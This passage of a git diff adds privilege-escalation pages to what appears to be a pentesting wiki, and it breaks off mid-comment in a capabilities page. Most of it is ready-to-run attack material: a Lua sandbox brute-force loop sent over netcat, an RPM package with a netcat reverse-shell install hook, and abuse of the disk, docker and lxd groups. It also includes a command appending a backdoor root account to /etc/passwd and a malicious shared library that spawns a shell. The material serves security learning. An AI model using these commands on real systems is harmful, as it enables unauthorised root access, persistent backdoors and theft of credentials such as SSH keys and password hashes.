functions change**. Therefore if you need to execute one specific function you can perform a brute force attack loading different lua environments and calling the first function of le library: + +```bash +#In this scenario you could BF the victim that is generating a new lua environment +#for every interaction with the following line and when you are lucky +#the char function is going to be executed +for k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end + +#This attack from a CTF can be used to try to chain the function execute from "os" library +#and "char" from string library, and the use both to execute a command +for i in seq 1000; do echo "for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end" | nc 10.10.10.10 10006 | grep -A5 "Code: char"; done +``` + +**Get interactive lua shell**: If you are inside a limited lua shell you can get a new lua shell \(and hopefully unlimited\) calling: + +```bash +debug.debug() +``` + + + diff --git a/linux-unix/privilege-escalation/exploiting-yum.md b/linux-unix/privilege-escalation/exploiting-yum.md new file mode 100644 index 00000000000..8af1cf1e9ed --- /dev/null +++ b/linux-unix/privilege-escalation/exploiting-yum.md @@ -0,0 +1,29 @@ +# Exploiting Yum +Further examples around yum can also be found on [gtfobins](https://gtfobins.github.io/gtfobins/yum/). + +## Executing arbitrary commands via RPM Packages +### Checking the Environment +In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root. + +#### A working example of this vector +A working example of this exploit can be found in the [daily bugle](https://tryhackme.com/room/dailybugle) room on [tryhackme](https://tryhackme.com). + +### Packing an RPM +In the following section, I will cover packaging a reverse shell into an RPM using [fpm](https://github.com/jordansissel/fpm). + +The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary. + +```text +EXPLOITDIR=$(mktemp -d) +CMD='nc -e /bin/bash ' +RPMNAME="exploited" +echo $CMD > $EXPLOITDIR/beforeinstall.sh +fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR +``` + +## Catching a shell +Using the above example and assuming `yum` can be executed as a higher-privileged user. + +1. **Transfer** the rpm to the host +2. **Start** a listener on your local host such as the [example netcat listener](/shells/shells/linux#netcat) +3. **Install** the vulnerable package `yum localinstall -y exploited-1.0-1.noarch.rpm` diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md new file mode 100644 index 00000000000..1a1d823fed0 --- /dev/null +++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md @@ -0,0 +1,170 @@ +# Interesting Groups - Linux PE + +## Sudo/Admin Groups + +### **PE - Method 1** + +**Sometimes**, **by default \(or because some software needs it\)** inside the **/etc/sudoers** file you can find some of these lines: + +```bash +# Allow members of group sudo to execute any command +%sudo ALL=(ALL:ALL) ALL + +# Allow members of group admin to execute any command +%admin ALL=(ALL:ALL) ALL +``` + +This means that **any user that belongs to the group sudo or admin can execute anything as sudo**. + +If this is the case, to **become root you can just execute**: + +```text +sudo su +``` + +### PE - Method 2 + +Find all suid binaries and check if there is the binary **Pkexec**: + +```bash +find / -perm -4000 2>/dev/null +``` + +If you find that the binary pkexec is a SUID binary and you belong to sudo or admin, you could probably execute binaries as sudo using pkexec. +Check the contents of: + +```bash +cat /etc/polkit-1/localauthority.conf.d/* +``` + +There you will find which groups are allowed to execute **pkexec** and **by default** in some linux can **appear** some of the groups **sudo or admin**. + +To **become root you can execute**: + +```bash +pkexec "/bin/sh" #You will be prompted for your user password +``` + +If you try to execute **pkexec** and you get this **error**: + +```bash +polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie +==== AUTHENTICATION FAILED === +Error executing command as another user: Not authorized +``` + +**It's not because you don't have permissions but because you aren't connected without a GUI**. And there is a work around for this issue here: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). You need **2 different ssh sessions**: + +{% code title="session1" %} +```bash +echo $$ #Step1: Get current PID +pkexec "/bin/bash" #Step 3, execute pkexec +#Step 5, if correctly authenticate, you will have a root session +``` +{% endcode %} + +{% code title="session2" %} +```bash +pkttyagent --process #Step 2, attach pkttyagent to session1 +#Step 4, you will be asked in this session to authenticate to pkexec +``` +{% endcode %} + +## Wheel Group + +**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line: + +```text +%wheel ALL=(ALL:ALL) ALL +``` + +This means that **any user that belongs to the group wheel can execute anything as sudo**. + +If this is the case, to **become root you can just execute**: + +```text +sudo su +``` + +## Shadow Group + +Users from the **group shadow** can **read** the **/etc/shadow** file: + +```text +-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow +``` + +So, read the file and try to **crack some hashes**. + +## Disk Group + + This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. + +Files:`/dev/sd[a-z][1-9]` + +```text +debugfs /dev/sda1 +debugfs: cd /root +debugfs: ls +debugfs: cat /root/.ssh/id_rsa +debugfs: cat /etc/shadow +``` + +Note that using debugfs you can also **write files**. For example to copy `/tmp/asd1.txt` to `/tmp/asd2.txt` you can do: + +```bash +debugfs -w /dev/sda1 +debugfs: dump /tmp/asd1.txt /tmp/asd2.txt +``` + +However, if you try to **write files owned by root** \(like `/etc/shadow` or `/etc/passwd`\) you will have a "**Permission denied**" error. + +## Video Group + +Using the command `w` you can find **who is logged on the system** and it will show an output like the following one: + +```bash +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +yossi tty1 22:16 5:13m 0.05s 0.04s -bash +moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash +``` + +The **tty1** means that the user **yossi is logged physically** to a terminal on the machine. + +The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to **grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size` + +```bash +cat /dev/fb0 > /tmp/screen.raw +cat /sys/class/graphics/fb0/virtual_size +``` + +To **open** the **raw image** you can use **GIMP**, select the **`screen.raw`** file and select as file type **Raw image data**: + +![](../../.gitbook/assets/image%20%28208%29.png) + +Then modify the Width and Height to the ones used on the screen and check different Image Types \(and select the one that shows better the screen\): + +![](../../.gitbook/assets/image%20%28295%29.png) + +## Root Group + +It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges... + +**Check which files root members can modify**: + +```bash +find / -group root -perm -g=w 2>/dev/null +``` + +## Docker Group + +You can mount the root filesystem of the host machine to an instance’s volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. + +{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} + +{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} + +## lxc/lxd Group + +[lxc - Privilege Escalation](lxd-privilege-escalation.md) + diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md new file mode 100644 index 00000000000..1fbe86aa6fa --- /dev/null +++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md @@ -0,0 +1,199 @@ +# Interesting Groups - Linux PE + +## Sudo/Admin Groups + +### **PE - Method 1** + +**Sometimes**, **by default \(or because some software needs it\)** inside the **/etc/sudoers** file you can find some of these lines: + +```bash +# Allow members of group sudo to execute any command +%sudo ALL=(ALL:ALL) ALL + +# Allow members of group admin to execute any command +%admin ALL=(ALL:ALL) ALL +``` + +This means that **any user that belongs to the group sudo or admin can execute anything as sudo**. + +If this is the case, to **become root you can just execute**: + +```text +sudo su +``` + +### PE - Method 2 + +Find all suid binaries and check if there is the binary **Pkexec**: + +```bash +find / -perm -4000 2>/dev/null +``` + +If you find that the binar**y pkexec is a SUID** binary and you belong to **sudo** or **admin**, you could probably execute binaries as sudo using `pkexec`. +This is because typically those are the groups inside the **polkit policy**. This policy basically identifies which groups can use `pkexec`. Check it with: + +```bash +cat /etc/polkit-1/localauthority.conf.d/* +``` + +There you will find which groups are allowed to execute **pkexec** and **by default** in some linux disctros the groups **sudo** and **admin** appear. + +To **become root you can execute**: + +```bash +pkexec "/bin/sh" #You will be prompted for your user password +``` + +If you try to execute **pkexec** and you get this **error**: + +```bash +polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie +==== AUTHENTICATION FAILED === +Error executing command as another user: Not authorized +``` + +**It's not because you don't have permissions but because you aren't connected without a GUI**. And there is a work around for this issue here: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). You need **2 different ssh sessions**: + +{% code title="session1" %} +```bash +echo $$ #Step1: Get current PID +pkexec "/bin/bash" #Step 3, execute pkexec +#Step 5, if correctly authenticate, you will have a root session +``` +{% endcode %} + +{% code title="session2" %} +```bash +pkttyagent --process #Step 2, attach pkttyagent to session1 +#Step 4, you will be asked in this session to authenticate to pkexec +``` +{% endcode %} + +## Wheel Group + +**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line: + +```text +%wheel ALL=(ALL:ALL) ALL +``` + +This means that **any user that belongs to the group wheel can execute anything as sudo**. + +If this is the case, to **become root you can just execute**: + +```text +sudo su +``` + +## Shadow Group + +Users from the **group shadow** can **read** the **/etc/shadow** file: + +```text +-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow +``` + +So, read the file and try to **crack some hashes**. + +## Disk Group + + This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. + +Files:`/dev/sd[a-z][1-9]` + +```bash +df -h #Find where "/" is mounted +debugfs /dev/sda1 +debugfs: cd /root +debugfs: ls +debugfs: cat /root/.ssh/id_rsa +debugfs: cat /etc/shadow +``` + +Note that using debugfs you can also **write files**. For example to copy `/tmp/asd1.txt` to `/tmp/asd2.txt` you can do: + +```bash +debugfs -w /dev/sda1 +debugfs: dump /tmp/asd1.txt /tmp/asd2.txt +``` + +However, if you try to **write files owned by root** \(like `/etc/shadow` or `/etc/passwd`\) you will have a "**Permission denied**" error. + +## Video Group + +Using the command `w` you can find **who is logged on the system** and it will show an output like the following one: + +```bash +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +yossi tty1 22:16 5:13m 0.05s 0.04s -bash +moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash +``` + +The **tty1** means that the user **yossi is logged physically** to a terminal on the machine. + +The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to **grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size` + +```bash +cat /dev/fb0 > /tmp/screen.raw +cat /sys/class/graphics/fb0/virtual_size +``` + +To **open** the **raw image** you can use **GIMP**, select the **`screen.raw`** file and select as file type **Raw image data**: + +![](../../../.gitbook/assets/image%20%28208%29.png) + +Then modify the Width and Height to the ones used on the screen and check different Image Types \(and select the one that shows better the screen\): + +![](../../../.gitbook/assets/image%20%28295%29.png) + +## Root Group + +It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges... + +**Check which files root members can modify**: + +```bash +find / -group root -perm -g=w 2>/dev/null +``` + +## Docker Group + +You can **mount the root filesystem of the host machine to an instance’s volume**, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. + +```bash +docker image #Get images from the docker service + +#Get a shell inside a docker container with access as root to the filesystem +docker run -it --rm -v /:/mnt chroot /mnt bash +#If you want full access from the host, create a backdoor in the passwd file +echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /etc/passwd + +#Ifyou just want filesystem and network access you can startthe following container: +docker run --rm -it --pid=host --net=host --privileged -v /:/mnt chroot /mnt bashbash +``` + +Finally, if you don't like any of the suggestions of before, or they aren't working for some reason \(docker api firewall?\) you could always try to **run a privileged container and escape from it** as explained here: + +{% page-ref page="../docker-breakout.md" %} + +If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../#writable-docker-socket)**.** + +{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} + +{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} + +## lxc/lxd Group + +{% page-ref page="./" %} + +## Adm Group + +Usually **members** of the group **`adm`** have permissions to **read log** files located inside _/var/log/_. +Therefore, if you have compromised a user inside this group you should definitely take a **look to the logs**. + +## Auth group + +Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey**_ and _**/var/db/yubikey**_ if they are used. +These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) + diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md new file mode 100644 index 00000000000..81f261d82c8 --- /dev/null +++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md @@ -0,0 +1,105 @@ +# lxd/lxc Group - Privilege escalation + +If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root + +## Exploiting without internet + +### Method 1 + +You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)\(follow the instructions of the github\): + +```bash +sudo su +#Install requirements +sudo apt update +sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools +#Clone repo +sudo go get -d -v github.com/lxc/distrobuilder +#Make distrobuilder +cd $HOME/go/src/github.com/lxc/distrobuilder +make +#Prepare the creation of alpine +mkdir -p $HOME/ContainerImages/alpine/ +cd $HOME/ContainerImages/alpine/ +wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml +#Create the container +sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8 +``` + +Then, upload to the vulnerable server the files **lxd.tar.xz** and **rootfs.squashfs** + +Add the image: + +```bash +lxc image import lxd.tar.xz rootfs.squashfs --alias alpine +lxc image list #You can see your new imported image +``` + +Create a container and add root path + +```bash +lxc init alpine privesc -c security.privileged=true +lxc list #List containers + +lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true +``` + +{% hint style="danger" %} +If you find this error _**Error: No storage pool found. Please create a new storage pool**_ +Run **`lxc init`** and **repeat** the previous chunk of commands +{% endhint %} + +Execute the container: + +```bash +lxc start privesc +lxc exec privesc /bin/sh +[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted +``` + +### Method 2 + +Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. + +```bash +# build a simple alpine image +git clone https://github.com/saghul/lxd-alpine-builder +cd lxd-alpine-builder +sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine +sudo ./build-alpine -a i686 + +# import the image +lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail. + +# before running the image, start and configure the lxd storage pool as default +lxd init + +# run the image +lxc init myimage mycontainer -c security.privileged=true + +# mount the /root into the image +lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true + +# interact with the container +lxc start mycontainer +lxc exec mycontainer /bin/sh +``` + +Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd_root) + +## With internet + +You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html). + +```bash +lxc init ubuntu:16.04 test -c security.privileged=true +lxc config device add test whatever disk source=/ path=/mnt/root recursive=true +lxc start test +lxc exec test bash +[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted +``` + +## Other Refs + +{% embed url="https://reboare.github.io/lxd/lxd-escape.html" caption="" %} + diff --git a/linux-unix/privilege-escalation/ld.so.conf-example.md b/linux-unix/privilege-escalation/ld.so.conf-example.md new file mode 100644 index 00000000000..5371fe251b4 --- /dev/null +++ b/linux-unix/privilege-escalation/ld.so.conf-example.md @@ -0,0 +1,155 @@ +# ld.so exploit example + +## Prepare the environment + +In the following section you can find the code of the files we are going to use to prepare the environment + +{% tabs %} +{% tab title="sharedvuln.c" %} +```c +#include +#include "libcustom.h" + +int main(){ + printf("Welcome to my amazing application!\n"); + vuln_func(); + return 0; +} +``` +{% endtab %} + +{% tab title="libcustom.h" %} +```c +#include + +void vuln_func(); +``` +{% endtab %} + +{% tab title="libcustom.c" %} +```c +#include + +void say_hi() +{ + puts("Hi"); +} +``` +{% endtab %} +{% endtabs %} + +1. **Create** those files in your machine in the same folder +2. **Compile** the **library**: `gcc -shared -o libcustom.so -fPIC libcustom.c` +3. **Copy** _****libcustom.so_ to _/usr/lib_: `sudo cp libcustom.so /usr/lib` \(root privs\) +4. **Compile** the **executable**: `gcc sharedvuln.c -o sharedvuln -lcustom` + +### Check the environment + +Check that _libcustom.so_ is being **loaded** from _/usr/lib_ and that you can **execute** the binary. + +```text +$ ldd sharedvuln + linux-vdso.so.1 => (0x00007ffc9a1f7000) + libcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000) + libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000) + /lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000) + +$ ./sharedvuln +Welcome to my amazing application! +Hi +``` + +## Exploit + +In this scenario we are going to suppose that **someone has created a vulnerable entry** inside a file in _/etc/ld.so.conf/_: + +```bash +sudo echo "/home/ubuntu/lib" > /etc/ld.so.conf.d/privesc.conf +``` + +The vulnerable folder is _/home/ubuntu/lib_ \(where we have writable access\). +**Downloadand compile** the following code inside that path: + +```c +//gcc -shared -o libcustom.so -fPIC libcustom.c + +#include +#include +#include + +void say_hi(){ + setuid(0); + setgid(0); + printf("I'm the bad library\n"); + system("/bin/sh",NULL,NULL); +} +``` + +Now that we have **created the malicious libcustom library inside the misconfigured** path, we need to wait for a **reboot** or for the root user to execute **`ldconfig`** \(_in case you can execute this binary as **sudo** or it has the **suid bit** you will be able to execute it yourself_\). + +Once this has happened **recheck** where is the `sharevuln` executable loading the `libcustom.so` library from: + +```c +$ldd sharedvuln + linux-vdso.so.1 => (0x00007ffeee766000) + libcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000) + libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000) + /lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000) +``` + +As you can see it's **loading it from `/home/ubuntu/lib`** and if any user executes it, a shell will be executed: + +```c +$ ./sharedvuln +Welcome to my amazing application! +I'm the bad library +$ whoami +ubuntu +``` + +{% hint style="info" %} +Note that in this example we haven't escalated privileges, but modifying the commands executed and **waiting for root or other privileged user to execute the vulnerable binary** we will be able to escalate privileges. +{% endhint %} + +### Other misconfigurations - Same vuln + +In the previous example we faked a misconfiguration where an administrator **set a non-privileged folder inside a configuration file inside `/etc/ld.so.conf.d/`**. +But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions** in some **config file** inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it. + +## Exploit 2 + +**Suppose you have sudo privileges over `ldconfig`**. +You can indicate `ldconfig` **where to load the conf files from**, so we can take advantage of it to make `ldconfig` load arbitrary folders. +So, lets create the files and folders needed to load "/tmp": + +```bash +cd /tmp +echo "include /tmp/conf/*" > fake.ld.so.conf +echo "/tmp" > conf/evil.conf +``` + +Now, as indicated in the **previous exploit**, **create the malicious library inside** _**/tmp**_. +And finally, lets load the path and check where is the binary loading the library from: + +```bash +ldconfig -f fake.ld.so.conf + +ldd sharedvuln + linux-vdso.so.1 => (0x00007fffa2dde000) + libcustom.so => /tmp/libcustom.so (0x00007fcb07756000) + libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000) + /lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000) +``` + +**As you can see, having sudo privileges over `ldconfig` you can exploit the same vulnerability.** + +{% hint style="info" %} +I **didn't find** a reliable way to exploit this vuln if `ldconfig` is configured with the **suid bit**. The following error appear: `/sbin/ldconfig.real: Can't create temporary cache file /etc/ld.so.cache~: Permission denied` +{% endhint %} + +## References + +* [https://www.boiteaklou.fr/Abusing-Shared-Libraries.html](https://www.boiteaklou.fr/Abusing-Shared-Libraries.html) +* [https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2](https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2) +* Dab machine in HTB + diff --git a/linux-unix/privilege-escalation/linux-capabilities.md b/linux-unix/privilege-escalation/linux-capabilities.md new file mode 100644 index 00000000000..75c2095c095 --- /dev/null +++ b/linux-unix/privilege-escalation/linux-capabilities.md @@ -0,0 +1,1422 @@ +# Linux Capabilities + +## Capabilities + +Normally the root user \(or any ID with UID of 0\) gets a special treatment when running processes. The kernel and applications are usually programmed to skip the restriction of some activities when seeing this user ID. In other words, this user is allowed to do \(almost\) anything. + +Linux capabilities provide a subset of the available root privileges to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation. + +### Why capabilities? + +To better understand how Linux capabilities work, let’s have a look first at the problem it tries to solve. + +Let’s assume we are running a process as a normal user. This means we are non-privileged. We can only access data that owned by us, our group, or which is marked for access by all users. At some point in time, our process needs a little bit more permissions to fulfill its duties, like opening a network socket. The problem is that normal users can not open a socket, as this requires root permissions. + +### List Capabilities + +```bash +#You list all the capabilities with +capsh --print +``` + +**Here you can find some capabilities with short descriptions** + +| Capabilities name | Description | +| :--- | :--- | +| CAP\_AUDIT\_CONTROL | Allow to enable/disable kernel auditing | +| CAP\_AUDIT\_WRITE | Helps to write records to kernel auditing log | +| CAP\_BLOCK\_SUSPEND | This feature can block system suspends | +| **CAP\_CHOWN** | Allow user to make arbitrary change to files UIDs and GIDs \(full filesystem access\) | +| **CAP\_DAC\_OVERRIDE** | This helps to bypass file read, write and execute permission checks \(full filesystem access\) | +| **CAP\_DAC\_READ\_SEARCH** | This only bypass file and directory read/execute permission checks | +| CAP\_FOWNER | This enables to bypass permission checks on operations that normally require the filesystem UID of the process to match the UID of the file | +| CAP\_KILL | Allow the sending of signals to processes belonging to others | +| CAP\_SETGID | Allow changing of the GID | +| **CAP\_SETUID** | Allow changing of the UID \(set UID of root in you process\) | +| CAP\_SETPCAP | Helps to transferring and removal of current set to any PID | +| CAP\_IPC\_LOCK | This helps to lock memory | +| CAP\_MAC\_ADMIN | Allow MAC configuration or state changes | +| **CAP\_NET\_RAW** | Use RAW and PACKET sockets \(sniff traffic\) | +| CAP\_NET\_BIND\_SERVICE | SERVICE Bind a socket to internet domain privileged ports | +| CAP\_SYS\_CHROOT | Ability to call chroot\(\) | +| **CAP\_SYS\_ADMIN** | Mount/Unmount filesystems | +| **CAP\_SYS\_PTRACE** | Debug processes \(inject shellcodes\) | +| **CAP\_SYS\_MODULE** | Insert kernel modules | + +### Capabilities Sets + +#### Inherited capabilities + +**CapEff**: The _effective_ capability set represents all capabilities the process is using at the moment \(this is the actual set of capabilities that the kernel uses for permission checks\). For file capabilities the effective set is in fact a single bit indicating whether the capabilities of the permitted set will be moved to the effective set upon running a binary. This makes it possible for binaries that are not capability-aware to make use of file capabilities without issuing special system calls. + +**CapPrm**: \(_Permitted_\) This is a superset of capabilities that the thread may add to either the thread permitted or thread inheritable sets. The thread can use the capset\(\) system call to manage capabilities: It may drop any capability from any set, but only add capabilities to its thread effective and inherited sets that are in its thread permitted set. Consequently it cannot add any capability to its thread permitted set, unless it has the cap\_setpcap capability in its thread effective set. + +**CapInh**: Using the _inherited_ set all capabilities that are allowed to be inherited from a parent process can be specified. This prevents a process from receiving any capabilities it does not need. This set is preserved across an `execve` and is usually set by a process _receiving_ capabilities rather than by a process that’s handing out capabilities to its children. + +**CapBnd**: With the _bounding_ set it’s possible to restrict the capabilities a process may ever receive. Only capabilities that are present in the bounding set will be allowed in the inheritable and permitted sets. + +**CapAmb**: The _ambient_ capability set applies to all non-SUID binaries without file capabilities. It preserves capabilities when calling `execve`. However, not all capabilities in the ambient set may be preserved because they are being dropped in case they are not present in either the inheritable or permitted capability set. This set is preserved across `execve` calls. + +For a detailed explanation of the difference between capabilities in threads and files and how are the capabilities passed to threads read the following pages: + +* [https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work) +* [https://blog.ploetzli.ch/2014/understanding-linux-capabilities/](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/) + +## Processes & Binaries Capabilities + +### Processes Capabilities + +To see the capabilities for a particular process, use the **status** file in the /proc directory. As it provides more details, let’s limit it only to the information related to Linux capabilities. +Note that for all running processes capability information is maintained per thread, for binaries in the file system it’s stored in extended attributes. + +```bash +cat /proc/1234/status | grep Cap +cat /proc/$$/status | grep Cap #This will print the capabilities of the current process +``` + +This command should return 5 lines on most systems. + +* CapInh = Inherited capabilities +* CapPrm = Permitted capabilities +* CapEff = Effective capabilities +* CapBnd = Bounding set +* CapAmb = Ambient capabilities set + +```bash +#These are the typical capabilities of a root owned process (all) +CapInh: 0000000000000000 +CapPrm: 0000003fffffffff +CapEff: 0000003fffffffff +CapBnd: 0000003fffffffff +CapAmb: 0000000000000000 +``` + +These hexadecimal numbers don’t make sense. Using the capsh utility we can decode them into the capabilities name. + +```bash +capsh --decode=0000003fffffffff +0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37 +``` + +Lets check now the **capabilities** used by `ping`: + +```bash +cat /proc/9491/status | grep Cap +CapInh: 0000000000000000 +CapPrm: 0000000000003000 +CapEff: 0000000000000000 +CapBnd: 0000003fffffffff +CapAmb: 0000000000000000 + +capsh --decode=0000000000003000 +0x0000000000003000=cap_net_admin,cap_net_raw +``` + +Although that works, there is another and easier way. To see the capabilities of a running process, simply use the **getpcaps** tool followed by its process ID \(PID\). You can also provide a list of process IDs. + +```bash +getpcaps 1234 +``` + +Lets check here the capabilities of `tcpdump` after having giving the binary enough capabilities \(`cap_net_admin` and `cap_net_raw`\) to sniff the network \(_tcpdump is running in process 9562_\): + +```bash +#The following command give tcpdump the needed capabilities to sniff traffic +$ setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump + +$ getpcaps 9562 +Capabilities for `9562': = cap_net_admin,cap_net_raw+ep + +$ cat /proc/9562/status | grep Cap +CapInh: 0000000000000000 +CapPrm: 0000000000003000 +CapEff: 0000000000003000 +CapBnd: 0000003fffffffff +CapAmb: 0000000000000000 + +$ capsh --decode=0000000000003000 +0x0000000000003000=cap_net_admin,cap_net_raw +``` + +As you can see the given capabilities corresponds with the results of the 2 ways of getting the capabilities of a binary. +The _getpcaps_ tool uses the **capget\(\)** system call to query the available capabilities for a particular thread. This system call only needs to provide the PID to obtain more information. + +### Binaries Capabilities + +Binaries can have capabilities that can be used while executing. For example, it's very common to find `ping` binary with `cap_net_raw` capability: + +```bash +getcap /usr/bin/ping +/usr/bin/ping = cap_net_raw+ep +``` + +You can **search binaries with capabilities** using: + +```bash +getcap -r / 2>/dev/null +``` + +### Dropping capabilities with capsh + +If we drop the CAP\_NET\_RAW capabilities for _ping_, then the ping utility should no longer work. + +```bash +capsh --drop=cap_net_raw --print -- -c "tcpdump" +``` + +Besides the output of _capsh_ itself, the _tcpdump_ command itself should also raise an error. + +> /bin/bash: /usr/sbin/tcpdump: Operation not permitted + +The error clearly shows that the ping command is not allowed to open an ICMP socket. Now we know for sure that this works as expected. + +### Remove Capabilities + +You can remove capabilities of a binary with + +```bash +setcap -r +``` + +## User Capabilities + +Apparently **it's possible to assign capabilities also to users**. This probably means that every process executed by the user will be able to use the users capabilities. +Base on on [this](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [this ](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)and [this ](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user)a few files new to be configured to give a user certain capabilities but the one assigning the capabilities to each user will be `/etc/security/capability.conf`. +File example: + +```bash +# Simple +cap_sys_ptrace developer +cap_net_raw user1 + +# Multiple capablities +cap_net_admin,cap_net_raw jrnetadmin +# Identical, but with numeric values +12,13 jrnetadmin + +# Combining names and numerics +cap_sys_admin,22,25 jrsysadmin +``` + +## Environment Capabilities + +Compiling the following program it's possible to **spawn a bash shell inside an environment that provides capabilities**. + +{% code title="ambient.c" %} +```c +/* + * Test program for the ambient capabilities + * + * compile using: + * gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c + * Set effective, inherited and permitted capabilities to the compiled binary + * sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient + * + * To get 